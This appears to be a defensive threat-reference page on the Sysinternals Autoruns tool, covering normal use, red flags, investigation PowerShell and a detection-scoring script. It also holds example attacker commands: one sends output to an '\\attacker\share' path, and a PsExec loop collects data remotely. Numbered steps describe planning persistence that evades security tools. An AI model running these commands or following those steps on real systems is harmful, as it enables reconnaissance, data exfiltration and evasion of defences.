autoruns.exe | Windows executable | Low Risk

Sysinternals Autoruns - Windows Startup Analysis Tool [2026]

Autoruns is a Sysinternals tool for viewing and managing Windows startup programs. Legitimate diagnostic tool that can be used by attackers for persistence discovery and evasion.

Last verified: Jan 18, 2025

Risk Summary

| Factor | Assessment |
|--------|------------|
| Detection Difficulty | Low |
| Abuse Potential | Medium |
| Prevalence | Common |
| Risk Score | 35/100 |

Autoruns is a legitimate Microsoft Sysinternals tool for startup management that can be abused for reconnaissance.

Overview

What is autoruns.exe?

Autoruns is a Microsoft Sysinternals utility that provides comprehensive visibility into all programs configured to run at system startup or login.

Key Characteristics

| Attribute | Value |
|-----------|-------|
| File Name | autoruns.exe, autoruns64.exe, autorunsc.exe |
| Developer | Microsoft (Sysinternals) |
| Digital Signature | Microsoft Corporation |
| Typical Size | 1-3 MB |
| Type | Diagnostic utility |

Technical Details

| Property | Description |
|----------|-------------|
| Process Type | User Application |
| Privileges | Administrator for full access |
| Network | VirusTotal integration (optional) |
| Variants | GUI (autoruns.exe), CLI (autorunsc.exe) |

Autoruns is widely used by IT professionals and security researchers for investigating persistence mechanisms.

Normal Behavior

Legitimate Usage Patterns

```text
autoruns.exe                 (GUI version)
autoruns64.exe               (64-bit GUI)
autorunsc.exe                (Command-line version)
autorunsc.exe -a * -c -h     (Export to CSV)
```

Expected Characteristics

| Aspect | Expected Behavior |
|--------|-------------------|
| Parent Process | explorer.exe, cmd.exe |
| User Context | Administrator |
| Network | Optional VirusTotal lookups |
| Registry Access | Extensive (reads startup keys) |

Command-Line Options

| Parameter | Purpose |
|-----------|---------|
| -a | Specify autostart types |
| -c | CSV output |
| -h | Hide Microsoft entries |
| -v | VirusTotal check |
| -x | XML output |

Common Locations

```text
C:\SysinternalsSuite\autoruns.exe
C:\Tools\autoruns64.exe
C:\Users\<user>\Downloads\autoruns.exe
```

Suspicious Indicators

Red Flags

| Indicator | Concern Level | Description |
|-----------|---------------|-------------|
| Renamed binary | Medium | Different filename |
| Remote execution | High | Launched via PsExec |
| Automated collection | Medium | Scripted data gathering |
| Results exfiltration | High | Output sent externally |

Reconnaissance Patterns

```powershell
# Suspicious usage patterns
autorunsc.exe -a * -c > \\attacker\share\autoruns.csv
autorunsc.exe -accepteula -a * -c -h | Out-File C:\Temp\autoruns.csv
```

Potential Abuse

| Activity | Concern |
|----------|---------|
| Silent collection | Gathering persistence info |
| Remote collection | Mapping enterprise autoruns |
| Disabling entries | Removing security software |
| Identifying gaps | Finding persistence opportunities |

Abuse Techniques

Persistence Discovery

Reconnaissance Use:
1. Deploy autoruns to compromised system
2. Collect all autostart entries
3. Identify security software persistence
4. Find gaps for attacker persistence
5. Map environment startup configuration

Evasion Planning

Attacker Analysis:
1. Export autoruns data
2. Identify security software entries
3. Find least-monitored startup locations
4. Plan persistence that blends in
5. Avoid locations watched by security tools

Command-Line Collection

```batch
:: Silent collection
autorunsc.exe -accepteula -a * -c -h > autoruns.csv

:: Remote collection
for /f %h in (hosts.txt) do (
    psexec \\%h autorunsc.exe -accepteula -a * -c > %h-autoruns.csv
)

:: Delete security autoruns (malicious)
autoruns.exe  [Then manually disable entries]
```

Defense Evasion

| Technique | Use of Autoruns |
|-----------|-----------------|
| Persistence Discovery | Find where to persist |
| Security Evasion | Identify security autostart entries |
| Blending In | Find busy locations to hide |
| Cleanup | Remove competitor malware |

Remediation Steps

Context Assessment

Autoruns Usage Review:
- Generally legitimate tool
- Context determines threat level
- Review who ran it and why
- Check what was done with output

Investigation

```powershell
# Find autoruns output files
Get-ChildItem -Path C:\ -Recurse -Include "*.arn","autoruns*.csv" -ErrorAction SilentlyContinue

# Check recent executions
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4688} |
    Where-Object { $_.Properties[5].Value -like "*autoruns*" } |
    Select TimeCreated, @{N='CommandLine';E={$_.Properties[8].Value}}
```
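The following PowerShell is an added example (not code from the original page) that scores each Autoruns execution found in Security event 4688 against the Red Flags table above (renamed binary, PsExec launch, scripted collection, output sent to a share). It assumes the Windows 10+ 4688 property layout (5 = NewProcessName, 8 = CommandLine, 13 = ParentProcessName) and that PsExec's service-side process is PSEXESVC.exe; the function names and sample records are the editor's own.

```powershell
# Known on-disk names for Autoruns; anything else carrying Autoruns switches is "renamed"
$KnownNames = 'autoruns.exe', 'autoruns64.exe', 'autorunsc.exe', 'autorunsc64.exe'

function Get-AutorunsRisk {
    param(
        [Parameter(Mandatory)][string]$ProcessName,   # 4688 NewProcessName (full path)
        [string]$CommandLine = '',                    # 4688 CommandLine (needs cmdline auditing)
        [string]$ParentProcessName = ''               # 4688 ParentProcessName (Win10+)
    )
    $flags  = @()
    $leaf   = [IO.Path]::GetFileName($ProcessName).ToLower()
    $parent = [IO.Path]::GetFileName($ParentProcessName).ToLower()
    if ($leaf -notin $KnownNames)   { $flags += 'RenamedBinary:Medium' }
    if ($parent -eq 'psexesvc.exe') { $flags += 'RemoteExecution:High' }   # launched via PsExec
    # -accepteula plus a machine-readable output switch (-c CSV / -x XML) = scripted run
    if ($CommandLine -match '(?i)-accepteula' -and $CommandLine -match '(?i)\s-[cx]\b') {
        $flags += 'AutomatedCollection:Medium'
    }
    # Redirecting output to a UNC path (\\host\share\...) sends results off the box directly
    if ($CommandLine -match '>\s*\\\\[^\\\s]+\\') { $flags += 'ResultsExfiltration:High' }
    $level = if ($flags -match ':High') { 'High' }
             elseif ($flags)            { 'Medium' }
             else                       { 'Normal' }
    [pscustomobject]@{ Process = $leaf; Parent = $parent; Level = $level; Flags = ($flags -join ', ') }
}

# Pull real 4688 records; the second match is a heuristic that also catches renamed copies
# by their Autoruns-style switches (assumption: the attacker kept the normal switch syntax)
function Get-AutorunsExecutions {
    Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties[5].Value -match '(?i)autoruns' -or
                       $_.Properties[8].Value -match '(?i)-accepteula.*\s-a\s' } |
        ForEach-Object { Get-AutorunsRisk -ProcessName $_.Properties[5].Value `
                                          -CommandLine $_.Properties[8].Value `
                                          -ParentProcessName $_.Properties[13].Value }
}

# Constructed sample records (not real telemetry) so the scoring can be seen offline:
# expected levels are Normal, High (renamed + PsExec + scripted) and High (share redirect)
$Samples = @(
    @{ P='C:\SysinternalsSuite\autoruns.exe'; C='autoruns.exe';                         PP='C:\Windows\explorer.exe' },
    @{ P='C:\Temp\update.exe';                C='update.exe -accepteula -a * -c -h';    PP='C:\Windows\PSEXESVC.exe' },
    @{ P='C:\Tools\autorunsc.exe';            C='autorunsc.exe -a * -c > \\srv\share\ar.csv'; PP='C:\Windows\System32\cmd.exe' }
)
$Samples | ForEach-Object { Get-AutorunsRisk -ProcessName $_.P -CommandLine $_.C -ParentProcessName $_.PP } |
    Format-Table -AutoSize
```

Run `Get-AutorunsExecutions` on a host with process-creation and command-line auditing enabled to score live events instead of the samples.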

Policy

| Context | Response |
|---------|----------|
| IT-initiated | Normal administration |
| Unknown source | Investigate thoroughly |
| Remote execution | Possible reconnaissance |
| Repeated execution | Monitor for pattern |

Investigation Checklist

Usage Context

  • Who executed Autoruns?
  • Was it IT/security initiated?
  • What was the business justification?
  • Was command-line version used?

Activity Analysis

  • What command-line parameters were used?
  • Was output saved to a file?
  • Where was output saved?
  • Was output transmitted anywhere?

Follow-up Activity

  • Were any autoruns entries modified?
  • Was security software affected?
  • What happened after Autoruns ran?
  • Is there evidence of persistence added?

Enterprise Scope

  • Was Autoruns run on multiple systems?
  • Is there evidence of remote execution?
  • Is this part of a larger campaign?

MITRE ATT&CK Techniques